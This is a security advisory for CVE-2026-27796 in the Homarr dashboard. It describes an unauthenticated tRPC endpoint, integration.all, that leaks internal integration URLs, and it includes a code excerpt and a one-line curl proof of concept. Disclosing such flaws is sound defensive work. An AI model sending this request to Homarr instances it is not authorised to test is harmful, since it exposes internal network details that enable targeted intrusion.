Summary
An unauthenticated information disclosure vulnerability was discovered in Homarr, a popular dashboard application. The integration.all tRPC endpoint is defined as a publicProcedure, allowing unauthenticated users to retrieve a complete list of configured integrations including sensitive metadata such as internal service URLs, integration names, and service types.
CVE ID: CVE-2026-27796
Advisory: GHSA-m4vc-4prp-cvp7
Affected Versions: Homarr ≤ 1.53.2
Patched Versions: None
Vulnerability Details
The vulnerability is caused by an overly permissive access control configuration for the integration list procedure. In packages/api/src/router/integration/integration-router.ts, the all procedure is defined using publicProcedure, making it accessible without any authentication:
// packages/api/src/router/integration/integration-router.ts
export const integrationRouter = createTRPCRouter({
all: publicProcedure
.output(z.array(integrationSchema))
.query(async ({ ctx }) => {
// ... fetches and returns all integrations
}),
The returned integrationSchema includes fields like url, which often contains internal IP addresses, local hostnames, or private subdomains for services that Homarr integrates with (e.g., Pi-hole, Plex, Sonarr, Docker).
Proof of Concept
Send a GET request to the integration.all endpoint:
curl -G 'http://127.0.0.1:7575/api/trpc/integration.all' \
--data-urlencode 'batch=1' \
--data-urlencode 'input={"0":{"json":null,"meta":{"values":["undefined"]}}}'
The response will contain a JSON array of all configured integrations and their internal URLs.
Impact
- Leak of internal network topology and service discovery information
- Disclosure of internal hostnames and IP addresses used by integrated services
- Identification of service versions and types configured in the environment, aiding in further targeted attacks
- Affects any Homarr instance exposed to untrusted networks